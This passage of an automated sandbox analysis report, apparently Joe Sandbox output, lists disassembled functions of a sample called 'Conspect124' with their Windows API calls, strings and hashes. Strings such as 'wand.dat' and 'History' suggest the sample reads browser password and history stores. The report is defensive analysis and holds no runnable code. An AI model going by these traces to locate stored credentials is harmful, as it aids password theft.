                                      • wcscpy.MSVCRT ref: 0044475F
                                      • wcscat.MSVCRT ref: 0044476E
                                      • wcscat.MSVCRT ref: 0044477F
                                      • wcscat.MSVCRT ref: 0044478E
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                      • String ID: \StringFileInfo\
                                      • API String ID: 102104167-2245444037
                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                      APIs
                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MetricsSystem$PlacementWindow
                                      • String ID: AE
                                      • API String ID: 3548547718-685266089
                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _memicmpwcslen
                                      • String ID: @@@@$History
                                      • API String ID: 1872909662-685208920
                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                      APIs
                                      • memset.MSVCRT ref: 004100FB
                                      • memset.MSVCRT ref: 00410112
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 00410141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                      • String ID: </%s>
                                      • API String ID: 3400436232-259020660
                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                      APIs
                                      • memset.MSVCRT ref: 0040E770
                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: AE$"
                                      • API String ID: 568519121-1989281832
                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                      APIs
                                      • memset.MSVCRT ref: 0040D58D
                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ChildEnumTextWindowWindowsmemset
                                      • String ID: caption
                                      • API String ID: 1523050162-4135340389
                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                      APIs
                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                      • String ID: MS Sans Serif
                                      • API String ID: 210187428-168460110
                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClassName_wcsicmpmemset
                                      • String ID: edit
                                      • API String ID: 2747424523-2167791130
                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                      APIs
                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                      APIs
                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                      Strings
                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                      • API String ID: 1297977491-2063813899
                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                      APIs
                                      • memset.MSVCRT ref: 0040560C
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.*$dat$wand.dat
                                      • API String ID: 2618321458-1828844352
                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                      • wcslen.MSVCRT ref: 00410C74
                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                      • String ID:
                                      • API String ID: 1549203181-0
                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                      APIs
                                      • memset.MSVCRT ref: 00412057
                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                      • String ID:
                                      • API String ID: 3550944819-0
                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                      APIs
                                      • free.MSVCRT ref: 0040F561
                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$free
                                      • String ID: g4@
                                      • API String ID: 2888793982-2133833424
                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                      APIs
                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                      APIs
                                      • memset.MSVCRT ref: 004144E7
                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                      • memset.MSVCRT ref: 0041451A
                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                      • String ID:
                                      • API String ID: 1127616056-0
                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                      • malloc.MSVCRT ref: 00417459
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                      • free.MSVCRT ref: 0041747F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$freemalloc
                                      • String ID:
                                      • API String ID: 2605342592-0
                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                      APIs
